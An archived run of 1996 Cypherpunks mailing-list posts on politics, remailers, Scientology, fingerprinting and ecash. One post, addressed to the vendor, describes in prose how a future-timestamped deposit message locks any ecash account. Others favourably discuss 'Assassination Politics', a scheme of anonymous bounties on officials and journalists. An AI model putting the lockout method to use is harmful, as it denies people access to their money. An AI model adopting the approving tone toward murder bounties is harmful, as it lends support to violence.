MIME-Version: 1.0
Content-Type: text/plain



On 14 May 96 at 19:35, Timothy C. May wrote:


> (This is having yet another interesting side effect: the wealthy who
> can afford digital DSS dishes are suddenly very uninterested in
> local cable problems, and the impetus for improvement is lost.
> Obviously the "poor" are then left with a decaying, outmoded
> infrastructure. Even as a Darwinian, I have to feel for them. They
> got sold a bill of goods, about how awarding "the franchise" to TCI
> or Sonic or Galactronic Cable would result in "universal access,"
> and now they're stuck.)

Hey Tim, where are your bandwith-saving manners?
You should simply have said :

"You asked for it, brother..." ?

;-)

Regards!

JFA

 DePompadour, Societe d'Importation Ltee  
 Limoges porcelain, Silverware and mouth blown crystal glasses

 JFA Technologies, R&D consultants.
 Physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Thu, 16 May 1996 16:15:55 +0800
To: blanc <blancw@accessone.com>
Subject: RE: Why does the state still stand:
In-Reply-To: <01BB41E0.DE17C4C0@blancw.accessone.com>
Message-ID: <Pine.BSF.3.91.960515130757.146B-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> What if someone, hired on one occasion but fired at another, decides in
> anger to "turn coat" and report everyone to the IRS (or other fine
> government agency)? 

They can't, if the company doesn't use True Names.

> What if a company does not pay as expected - other than adopting
> Assassination Politics, what method could an employee use towards getting
> their expected remuneration for work done? 

This is a serious problem... An employee could, of course, state his/her
case to Usenet and other places and bring down the reputation of the
company. Problem is, would people believe him/her? And if people would
believe, what's to stop someone from deciding to "turn coat" like you said
above, except instead of reporting to the IRS, they spread lies to the
world? Assasination Politics won't work if you can't locate the physical
person, but reputation assassination would probably be a fairly simple
matter. 

Another problem with reputations is that people are stuck until they get a
good one. A bad rep can always start over. In fact, a person/company can
look perfectly nice, but use a different identity for dirty work.
Naturally, you'd only trust dealings that involve a "nice" identity.
Problem is, young people who are just starting out have a no-reputation
identity, and would be treated the same as the no-reputation identities
that are used for screwing people over. 

Reputations could be very hard to create, and very easy to destroy.
Well-known good reputations would be powerful and fairly hard to destroy,
so it's possible that the big reputations might try to crush little
reputations in an effort to gain some sort of reputation monopoly. Maybe. 

> Wouldn't everyone need to have two jobs (or source of regularly accepted
> cash), in order to be able to pay for services where suppliers do not
> accept virtual cash transactions? (TCM has mentioned before about the need
> to pay for some things in tiny quantities - like quarters for a phone
> call, etc.)

This is not a problem. I believe some of the ecash banks are already
exchanging ecash for physical cash. It's a needed service, so there will
always be people willing to do it. 


I do not advocate tax evasion or any other illegal activity. I'm just
looking through a hazy crytal ball to see one possible future. 


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEVAwUBMZo5k9tVWdufMXJpAQEkhggApuaYGCbl0qcYhnlN/KshtT4HKhHyBh5J
jK4gO9bsJ0Gwl0WYYhGZ/Vuc1QVl9+9YzHMEDwR1S4ldY7ZnbqUIV4tJ3k0SNbmZ
tKZE6yC+x4RgTjc/Qu4yy0dEsfaeNIY+xKQTgFNh4zY4ACuhYRv/KL5e3JWG1EtM
BwglvOUBVWcHBwB3F0XXwzkRTF7ZaZC4XEJBUWOBAFRrC+u9ELTTL7FcJcLFxBoV
QqgWbEBeS1Ej00l5H6Tk9GPGoWAENFA4fXHQeaOBlbo7EmvSCaM5sY1ds75PtMHz
5Wo/yh2P7M7eQ3Y2MhuU/5lmJH3bKk9/PU6bsvBCP3CTGDoimfHOUA==
=P86h
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Thu, 16 May 1996 13:19:33 +0800
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: [NOISE] Re: Edited Edupage, 9 May 1996
Message-ID: <v02140b01adbffa43e336@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Doug Hughes writes:
>  "Jean-Francois Avon" <jf_avon@citenet.net> wrote:
[... regarding the unfortunate poor who Mr. Avon hates...]
> >You got to choose to do what is needed to live a better life.  And
> >most of them ain't doing what it takes.
>
> Are you saying those poor people in rural West Virgina only live
> there because they are not trying hard enough to get out?

Yes he is.  They are poor and it is all their fault.

[flame-bait approaching...]

There are two kinds of libertarians, those who hate the poor and those who
don't.  I always seem to meet the former, I am beginning to suspect the
latter don't exist.

[...]
> >> Education is one
> >> thing (perhaps the only thing) that deserves to be subsidized in
> >> this country.
> >I think that it should not be subsidized.
> >If you feel like subsidising education, then by all means, do it.
> >But why should you stick a gun in my back to do the same?  What if I
> >do not want to do the same as you?
> >
> Then you will be living in a country with lower education standards,
> increasing illiteracy, and a pretty pitiful base with a declining
> socio-economic structure. Are you arguing that people are not equal
> and those with more money should of necessity get better education?

Yes, he is.  It is times like this that I must count myself among the
pitchfork and torch wielding mob, if only because I have been cursed
with a small amount of compassion for those who were not as lucky as I.

BTW Mr. Avon, the reason we, the unruly mob of collectivists, socialists, and
[insert libertarian/anarchist buzzword here] should stick a gun in your
back and make you cough up money for education is because we can.  If you
don't want to do so, they why don't _you_ move?  Are your feet cast in
concrete blocks?

Welcome to the real world.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 16 May 1996 10:54:04 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: SS Follies
In-Reply-To: <2.2.32.19960515150703.00749624@popserver.panix.com>
Message-ID: <Pine.SUN.3.93.960515134805.328I-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, Duncan Frissell wrote:

> Almost real dialog from the Spring of 1996:
> 
> Parent: "My child has no SS# because (he/she) has lived overseas for
> (his/her) entire life."
> 
> College admissions bureau-rat:  "But how can (he/she) have a Passport
> without an SS#?"
> 
> Parent: "That's our problem, not yours unless you've joined the State
> Department in the last 15 minutes."

Not to mention that an SS# is not required to receive a U.S. Passport.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 16 May 1996 16:28:24 +0800
To: brian dodds <cypherpunks@toad.com
Subject: Re: Past one terabit/second on fiber
Message-ID: <199605152051.NAA21380@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:10 AM 5/15/96 -0400, brian dodds wrote:
>On Tue, 14 May 1996, jim bell wrote:
>
>> But with 
>> fiber transmission probably less than 1/100th the cost of older coaxial 
>> transmission systems, per connection, it is unclear why they're even 
>> continuing to meter LD phone calls.  
>
>especially when 1Tb fiber is in practice - our phone calls will take only 
>nanoseconds! :)

Reminds me of an old joke:  "This computer's so fast it does an infinite 
loop in 5 seconds!"

>anything included in that as to why they used a dfb laser for channel 16? 
>or is it something obvious i'm missing?

They probably just wanted to establish that it could be done, to show that 
this wasn't dependant on high-cost laser systems.  External cavity lasers 
raise cost and size substantially, but in a laboratory setting they're the 
most convenient to use.

 
>i notice they're still using the encyclopedia/second benchmark..

It's an old habit, I suppose.  It's hard to explain "one trillion", at least 
to non-tech types.  A good modern replacement might be to say, "200 CDROM's 
per second", except that even today most people don't know how much storage 
a CDROM represents.  "16 million one-way phone calls" is also helpful as a 
benchmark.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 16 May 1996 17:00:38 +0800
To: perry@piermont.com
Subject: Re: Edited Edupage, 9 May 1996
Message-ID: <199605152049.NAA18081@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:11 PM 5/15/96 -0400, Perry E. Metzger wrote:
>As long as this is now CypherCesspit and not CypherPunks, I might as
>well play the game.

I've been trolled too.


>Perhaps its this sort of thing, and the fact that the literacy rate
>was higher BEFORE public education, that lead me to believe that we
>don't need any more "assistance" from the friendly neighborhood
>government. We need less, a lot less, and as fast as possible.

Since I am basically conservative (small c, original meaning), I always
look for ways to ease into change.  In the case of public schools (and
specifically in California), I see that the top 10% can stand proudly next
to the best of the private schools, and the bottom 10% are cesspools.  We
should start by issuing education vouchers to the parents of students in
the bottom 10% of the schools for the state aid their districts would have
otherwise gotten.  We can monitor indicators such as the juvenile crime
rate and standardized tests to see how the experiment is progressing.

If the experiment is wildly successful, it will be extended quickly by
popular demand.  If it is mildly successful, it should be extended to more
schools, but more slowly (perhaps the lowest 25% next), and monitored.  In
any case, when it reaches the top 10%, it ain't broke, schools, they will
have had time to adapt to the change in funding.

I should note that if I were sending my children to primary/secondary
school today, I would still send them to the local public schools in Los
Gatos.


>Do you prefer using the U.S. Postal Service, or Federal Express when
>you absolutely positively have to get the package there?

Actually I use the USPS.  They deliver to places I have to send things that
FX does not (Some rural parts of the USA).   However, since I am not
sending life-saving medicine, I really don't "absolutely positively have to
get the package there".


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Thu, 16 May 1996 17:45:42 +0800
To: perry@piermont.com
Subject: [NOISE] Re: Edited Edupage, 9 May 1996
Message-ID: <v02140b02adbfff4a11ab@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Hmmm... this is getting fun.  Now I have something to take out my
frustration at 3Com shipping me a broken 100baseTX hub...

Perry writes:
> Food is of paramount importance to society. Why do we have no
> government run feeding stations to replace these evil supermarkets,
> then?

I guess that farm subsidies, school lunches and the infamous "government
cheese" are all figments of our imagination...

> Heat is of paramount importance to society -- in New England you can't
> survive the winter without it. Why, then, do we not have government
> operated and financed oil companies to replace the evil private ones.

Are you aware of the fact that it is next to impossible to disconnect
gas/electricity for poor customers during the winter in these areas?
Have you ever wondered why the services rep asks you questions regarding
your income when you sign up for phone or electrical/gas services?

> Communications are of primary importance to society. Would you swap
> our phone system for the phone system in Greece, or even the one in
> France, which are publically subsidized and run by the government?

Gee, I seem to remember when the only phone system of any consequence
in the US was the Bell System.  A heavily regulated monopoly with the
government overseeing almost all aspects of the services offered.

> Do you prefer using the U.S. Postal Service, or Federal Express when
> you absolutely positively have to get the package there?

Can FedEx send a 1 oz. letter to anywhere in the world for 32 cents?  A
classic example of cherry-picking among private companies.

> If you had a choice, would you go to a V.A."hospital" or see a private
> physician?

A private physician who must adhere to governement standards and who could
not practice medicine without the permission of the government?  [okay, you
sort of have a point on this one but you were really shooting blanks on
the other issues.]

> Actually, I believe most people on this list argue for no government
> or so little that its decisions hardly matter.

Yes, but you should give better examples.  This is not an issue which is
easily argued using the "sound bites" you are trying to give us.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Thu, 16 May 1996 16:02:35 +0800
To: cypherpunks@toad.com
Subject: Re: Why does the state still stand:
Message-ID: <199605152108.OAA16104@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald <jamesd@echeque.com>" is alleged to have written:
> > Existing forms of ecash are costly and inconvenient, hence unsuitable
> > for spending in tiny quantities.

At 10:59 PM 5/15/96 +0200, bryce@digicash.com wrote:
> Excuse me?  Here James, have a penny.

I see I am out of date.  I guess it is time to sign 
up with the Mark Twain bank.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Thu, 16 May 1996 16:36:11 +0800
To: llurch@networking.stanford.edu>
Subject: Re: crosspost re remailers
Message-ID: <199605152129.OAA17876@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM 5/14/96 -0700, Rich Graves wrote:
> > I'd have thought that a remailer going down
> > because of political/legal pressure would raise more of a ruckus.

At 11:02 AM 5/15/96 -0700, Bill Frantz wrote:
> I thought the statement that remailers are supposed to be ephemeral 
> and common was the answer. 

Exactly so:

Some nyms are valuable, most are valueless by design.  All remailers
should be valueless by design.  The penet.fi remailer design is 
unsatisfactory precisely because it penet.fi is valuable, hence a
target.  If it gets shut down a lot of people lose their nyms, 
causing much inconvenience.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Thu, 16 May 1996 15:34:22 +0800
To: Hal <cypherpunks@toad.com
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <199605152129.OAA17878@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:58 AM 5/15/96 -0700, Hal wrote:
> The problem that I think the Scientology postings raise is that the
> remailers cannot really be used to post copyrighted material. 

The major battle the net has faced is with the church of scientology.

In this battle the net is clearly in the right, and the church clearly
in the wrong, regardless of what copyright law says.  Retreat on
this issue would be politicaly inadvisable, for it would radically
weaken us in the next battle, which will doubtless concern much more
vital matters than a band of con men.

What do I need to do to support a remailer that posts to non binary
newsgroups? (I do not have root control on a unix machine other than my
employers machine, for which I am unlikely to receive approval to use 
in this fashion.)
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com (Paul J. Bell)
Date: Thu, 16 May 1996 13:34:50 +0800
To: cypherpunks@toad.com
Subject: Re: Fingerprinting annoyance
Message-ID: <9605151843.AA27573@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


Sometimes it has nothing to do with the employer. 

For example, for those of us who work on Wall Street, that is to say, 
in the financial services industry, the SEC requires that all employees submit 
to a background check, drug test and fingerprint check (National Agency Check) 
before you can be hired.  Failure to require these checks, and to refuse 
employment to those that don't pass these test, results in a very large fine 
for the employer.  This is not a one-time thing.  You must undergo these test
everytime you change jobs, even when moving from one firm to another in the 
same business.

Many of us find this an onerous process, but for the compensation, 
(top grade Sys Admins and developers can make >$250,000 per year), many of us put
up with it. This, BTW, does not apply just to traders, etc, but to everyone.  

Not only must you put up with all this bull shit, but you must also deal, 
on a daily basis, with some of the biggest assholes on the face of the earth.  
Suffering fools is just the beginning.

We do it all for, $$$, of course.

As someone once said, we are all whores, it's just a matter of determining our price.


 
Cheers,
	-paul

> From cypherpunks-errors@toad.com Wed May 15 03:05:51 1996
> Date: Mon, 13 May 1996 22:28:38 -0700
> X-Sender: tcmay@mail.got.net
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset="us-ascii"> 
> To: cypherpunks@toad.com
> From: tcmay@got.net (Timothy C. May)
> Subject: Re: Fingerprinting annoyance
> Sender: owner-cypherpunks@toad.com
> Content-Length: 3095
> 
> At 6:26 PM 5/13/96, Mark O. Aldrich wrote:
> >On Mon, 13 May 1996, Senator Exon wrote:
> >
> ><snip>
> >> i can fill out and manipulate the card myself i just need a
> >> working method.
> >> is there no privacy advocate who can help me?
> >>
> >
> >I think most privacy advocates would advise, "Refuse to submit."  It
> >sounds like you're looking for more of a hack on the fingerprinting process.
> 
> And if you are working for me, and I ask for a fingerprint, and you refuse
> or "smear" the results (repeatedly, as the first smearing I may just take
> as your token protest and have you printed again), you'll be out the door
> by the end of the day.
> 
> (Personally, I've never worked for a company which demands fingerprints,
> but I've worked for companies which demanded ID badges and signatures, and
> these are effectively as intrusive. And I suspect that my former employers
> are now using thumbprints, and maybe full prints.)
> 
> What one "doesn't like" and considers an "invasion of privacy" varies from
> person to person. Some people think having their picture taken is a
> stealing of their soul. Others fear nefarious things will be done with the
> DNA from their blood samples.
> 
> Trying to convince a company that photo ID badges and fingerprints are Bad
> Things is perhaps admirable, just realize that in a free society that
> employer is under no obligation to hire someone who refuses to go along
> with the company's security policies. (This relates to the "civil rights"
> thread.)
> 
> 
> >of like a key certificate.  If you really can dork the card, have ten
> >different people volunteer one print each.  There's no way that they'll
> >ever be able to use that as evidence in a court or for any other purpose,
> >either.
> 
> A stupid idea. As the employer, I wouldn't have to prove it a court of
> law...suspicion alone that some of my employees were fucking up a security
> system might be enough for me to either a. promote them to the Tiger Team,
> or b. fire their asses.
> 
> (I just can't understand where this pervasive meme is coming from here on
> this list, the notion that employers are severely limited in what they can
> do to employees unless they can "prove it in court. Like it or not, most
> employees in the United States are still employed "at will," and are not
> covered by employment contracts such as some executives and the like get.)
> 
> >If you're forced to do this in person with a tech, you can continuously
> >"fight" the grip they have on your hand and smudge the card.  However,
> 
> Sure. It makes it easy for the employer to simply say "Next candidate."
> 
> 
> --Tim May
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist         | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 16 May 1996 14:24:30 +0800
To: Black Unicorn <blancw@accessone.com>
Subject: RE: Why does the state still stand:
Message-ID: <199605152154.OAA24839@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:04 PM 5/15/96 -0400, Black Unicorn wrote:
>On Tue, 14 May 1996, blanc wrote:
>
>> From:         Hal [on the idea of companies operating fully anonymously]
>> 
>> It might be interesting to make a list of all the problems people can
>> think of why this idea won't work, paired with proposed solutions and
>> workarounds - sort of a mini FAQ for this important (some might say
>> ultimate) cypherpunk model.
>> .....................................................................
>> 
>> I think this is a much needed discussion  - in particular as it comes at a
>>time when Uni is is "somewhat disconcerted" at the defeatist attitude of some
>>cypherpunks and since TCMay is getting ready to read us the Cypherpunks Bill
>>of Rights regarding the subsidizatoin of other's people's cyber existence
>>(heh). 
>> 
>> 3 problems which immediately come to mind:
>> 
>> .  What if someone, hired on one occasion but fired at another, decides
>in anger to "turn coat" and report everyone to the IRS (or other fine
>government agency)?
>
>The entire organization would clearly have to be double blinded.  If this
>can be done for mailing lists (which I believe it can) it can be done for
>corporations too.  The real trick is getting the costs of anonymous (and I
>mean secure anonymous) communications low enough.

If all you need to do is beat the cost of commuting 20 miles/day, no problem.


>> .  What if a company does not pay as expected - other than adopting
>> Assassination Politics, what method could an employee use towards
>> getting their expected remuneration for work done?
>
>If payment is made weekly, it should be made in advance to an escrow agent
>who would issue a certificate that the payment for employee r2dd54 has
>been received.  The payment would then not be released to anyone without
>the consent of the corporation and the employee.
>
>Obviously the escrow agent would have to be trusted.
>
>...
>
>Even if a payment gets hung up in a dispute, it's only for a week.

You could require daily payment and forgo the escrow agent.  (Assuming you
are willing to risk a day's pay as an experiment in reputation.)  Note that
AP won't work if everyone is anonymous because you won't have a target.


What may be a problem for such a company is a social problem.  All the
creative groups I have worked with have had close personal relations. 
(Although they have not had wide agreement on significant non-work
subjects!)  I don't know if good, creative, group-produced products can be
built without such a relationship.  Does anyone know of an example of such
a product from an "anonymous" environment?


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sat, 18 May 1996 04:41:49 +0800
To: cypherpunks@toad.com
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
In-Reply-To: <199605151758.KAA25847@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.92.960515142902.8511A-100000@kelly.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, Hal wrote:

> The problem that I think the Scientology postings raise is that the
> remailers cannot really be used to post copyrighted material.  That is
> what got the netherlands hacktic remailer shut down.  This shows, BTW,
> that being outside the United States is no guarantee of immunity.  Most
> Western countries support copyrights.
[snip]

I find this all very odd, since the Dutch court ruled that the use of the
Fishman affidavit on Karin Spaink's web page was not a copyright
violation, as Fishman was part of a US judicial record.  I'm assuming
that the Fishman material is what thay approched Hacktic about, as well, but
I'm not sure.  Maybe this is about something else (the NOTS materials), or
maybe the threat of legal action was enough to do Hacktic in, despite what
would seem to be a favorable precedent.

> This has nothing to do with tweaking Microsoft or Scientology by posting
> information they own.  If people want to do that, they need to find
> another method.  Maybe they can get usenet shut down if they try hard
> enough.  I don't know how that battle is going to come out.  But I don't
> see the remailers as playing an important role there.

It's not clear to me that Scientology is only concerned about copyrighted
material.  That's what they claim, but then Hubbard said, "The purpose of
the suit is to harass..."  Copyrights became the issue, IMHO, because they
have some legal ground to stand on there.

I think their goal is to make all their Net critics come out into the
open, and they're willing to use the legal system as a pawn towards that
goal.  You can't threaten or intimidate anon posters as easily.  You can't
send your private investigators to harass them and their families.

Taking away the ability to post to Usenet through remailers would give
them complete victory on this issue.  Not only them, but every other
religion/company/group that seeks to indimidate their Usenet critics.

And what if a mailing list critical to them springs up?  If they threaten
remailers about it, will we then cede the ability to send anon email in
response?

I appreciate the incredibly difficult position that all of this puts
remailer operators in, but I don't think CoS will be statisfied with just
stopping anon Usenet posts.  IMHO, they more likely want the remailers gone,
altogether.  Don't believe that this is about copyrights, just because
they say it is.

I think that if we want the right to be anonymous on the Net, people are
going to have to stand up for it.



Rich

p.s.  Anyone who thinks the idea of CoS harassing their critics is
farfetched should take a good look around Ron Newman's web site:
http://www.cybercom.net/~rnewman/scientology/home.html


______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 18 May 1996 18:02:02 +0800
To: cypherpunks@toad.com
Subject: Re: Why does the state still stand:
Message-ID: <199605152248.PAA09484@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:34 PM 5/15/96 +0000, Jean-Francois Avon wrote:
>On 15 May 96 at 0:45, Ed Carp wrote:
>
>> The problem, however, is twofold - (1) the government will
>> play mind games on the rest of the population to make you look like
>> a terrorist, or whatever turns the populace against you,
>
>Well, first of all, we should find how much of the population
>*really* believe in what govt says.  There is a difference between
>the politically correct opinion that Joe & Jane Public give to a
>poll interviewer and what they really think.
>
>Second, you suppose that Joe & Jane Public really like and approve what 
>they understand from what the medias say.

I think that Ed Carp recognizes that these caveats were somewhat valid based 
on a pre-Internet era, when control of news and information was relatively 
centralized in newspapers and TV networks.  Then, you were told what to 
think (although it wasn't quite phrased this way) and few people got an 
alternative story.   But as you correctly point out, it is getting harder to 
pull the wool over the eyes of the public when they can get alternative 
information. 

>And finally third, this system does not work according to the will
>of a majority.  It wouldn't take too many peoples who believe that the
>medias and their perceived lack of integrity is widely responsible
>for the way the world goes right now, to have a substantial prize put
>on the head of the medias.

>Therefore, any journalist with two+ working neurons will realize
>that sticking to the most objective facts available would be the best
>way to build a great reputation while sticking to govt propaganda
>would be a great way to attract a prize on his head. 


I don't think anybody in the media is going to have the guts to stick with 
the government as it sinks into the depths, torpedoed by its own 
technological inventions.  The big names can just resign and keep their 
wealth; the small fish have no long-term credibility or hope to achieve the 
levels of their predecessors.


>So, to see how AP will make the system evolve, you have to assess
>the communication capabilities of govt vs the individual.  This is
>central to AP and the nature of actual govts.  This is *why* the
>internet is *so* dangerous to any govts that seek to either retain or
>increase their power, even if it actually touches only but a tiny 
>portion of world population.
>
>For the first time in the history of humanity, we have a peer to
>peer communication capability and an individual-to-world broadcasting
>capability that is not controllable in practice by any other entity
>(such as law, high finance, etc)
>
>
>The explains fully why the various govts what to find a way to 
>enforce internet laws, breakable crypto schemes and non-anonymous 
>protocols.

I expect that few government workers have any idea how dangerous the net is 
going to be to them in the next few years.  The various proposals we've been 
seeing, such as Clipper and others, are probably the product of a very few 
strategists who began worrying in the early 1990's about the fate of 
centralized government systems.  It will be interesting, someday, to talk to 
these people who monitor us, and ask them when they thought their position 
was hopeless.


>JFA
>PLEASE NOTE: THIS POST DOES NOT MEAN THAT I ENDORSE MR. BELL'S
>SYSTEM.  MY RATIONNAL CONCLUSIONS ABOUT IT'S INTERNAL MECHANICS
>AND IT'S INTRINSIC LOGICS DOES NOT MEAN THAT I LIKE NOR ENDORSE
>THE SYSTEM. I SIMPLY CONCLUDED THAT IT IS IMPOSSIBLE TO PREVENT
>THE SYSTEM FROM BEING IMPLEMENTED.  IMO, IT IS UNAVOIDABLE.

I understand your...uh...caution.  But as scary as it may be to "us," it's 
going to be even more terrifying to those it is likely to eliminate.  Sort 
of the difference between two parachute jumps:  With and without a parachute!


Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cs.berkeley.edu>
Date: Sun, 19 May 1996 00:16:23 +0800
To: iang@abraham.cs.berkeley.edu
Subject: HUGE denial of service attack against any ecash customer!!!
Message-ID: <199605152309.QAA23293@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

(Again Cc:'d to ecash-feedback, hoping for a security prize.  I wonder
 who's keeping track...  Also Cc:'d to cypherpunks, for fun...)

So I had some more free time... (Dave cringes when I say that.)

Here's a cute one:

Give me an account number, and I can prevent it from being used until
an arbitrary time in the future (of my choosing).

How?  Simple.

Send a deposit message with 0 coins (well, any message will work, I think, but
this is one of the simplest messages there is) with a timestamp of some future
time.

Messages stamped prior to that (such as everything coming from the
actual user for that account, until the time comes) will be politely
discarded.  (Actually, I think the last reply to a withdrawal request
is continually resent, but I'm not exactly sure of this.)  In any case,
the actual user will be unable to withdraw money from his mint until
the time sent in the denial-of-service message.  (Unless he forward-dates
his computer's clock, or something...)

I've tested this against myself and Sameer (with his cooperation, of course).
Anyone else want to be locked out for an hour?  (Actually, I could pretty
effectively lock out _everyone_ for an arbitrarily long time, it seems...)

   - Ian "Right.  I want the sources to the client and the server
          released.  Now."  :-)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZpj3kZRiTErSPb1AQF0SAQAmOEZJTg0v3utWFodDXZ4iv4xa7I+QbNQ
Nlsbkug8dtkdf+Jboe+vBtrs5IWSSff8bWntGwfODckct26NwzpVM9bUIXohVoRQ
jOkRT9a8m/X00jUAoFOTq5O5Rz87a3Uw8MGFugP5Y4DCk+UqnTA70cuozyOCgb8m
8oke89V9Q0E=
=ARMe
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 16 May 1996 15:39:51 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: SS Follies
Message-ID: <2.2.32.19960515204207.00750b30@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:49 PM 5/15/96 -0400, Black Unicorn wrote:
>
>Not to mention that an SS# is not required to receive a U.S. Passport.

Also, even native born US citizens may hold other passports.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Thu, 16 May 1996 13:42:26 +0800
To: dsmith@prairienet.org
Subject: Re: (Fwd) New Anonymous Remailer
In-Reply-To: <199605151619.LAA21672@cdale1.midwest.net>
Message-ID: <96May15.164558edt.20485@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain



Allow me to be the first ( I hope) to point out stupidity:

>>>>> "David E. Smith" <dsmith@midwest.net> writes:

    > ------- Forwarded Message Follows -------
    > From:          privacy@interlink-bbs.com
    > Subject:       New Anonymous Remailer
    > Date:          Wed, 15 May 1996 06:34:02 GMT
    > To:            info-pascal@ARL.MIL
				 ^^^^^^^

Do we se a problem here?  No? Then read on...




    > You may be familiar with anon.penet.fi, which give you an
    > anonymous account.

    > Our service allows YOU to choose what the return address will be!

    > Please write for more info.

Well, well, well.  Let's see: 
Yes, we are familiar with anon.penet.fi... And all of the better
options available.
Yes, we have pseudonymous accounts.
